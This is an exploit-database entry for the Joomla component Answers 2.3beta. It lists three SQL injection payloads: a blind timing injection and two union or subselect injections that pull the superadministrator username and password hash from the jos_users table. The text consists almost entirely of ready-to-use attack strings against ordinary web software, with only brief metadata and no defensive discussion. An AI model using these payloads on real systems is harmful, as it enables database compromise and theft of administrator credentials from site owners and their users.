Joomla! Component Answers 2.3beta - Multiple Vulnerabilities

Author: jdc
type: webapps
platform: php
port: 
date_added: 2010-06-17  
date_updated: 2017-01-06  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comcom_answers-2.4.zip  

raw file: 13923.txt  
# Exploit Title: Joomla Component Answers v2.3beta Multiple Vulnerabilities
# Date: 25 May 2010
# Author: jdc
# Software Link:
http://extensions.joomla.org/extensions/communication/forum/12652
# Version: 2.3beta
# Tested on: PHP5, MySQL5

Blind SQL Injection
===================
Requires: magic_quotes OFF

?option=com_answers
&task=categ
&id=-1' union select benchmark(100000,md5(5)) as a -- '


Title Field SQL Injection
=========================
title',(select concat(username,char(32),password) from jos_users where
gid=25 limit 1),'0','1','0','','') -- ;


SQL Injection
=============
Requires: magic_quotes OFF, Joomla! debug OFF

?option=com_answers
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9
from jos_users where gid=25 limit 1 -- '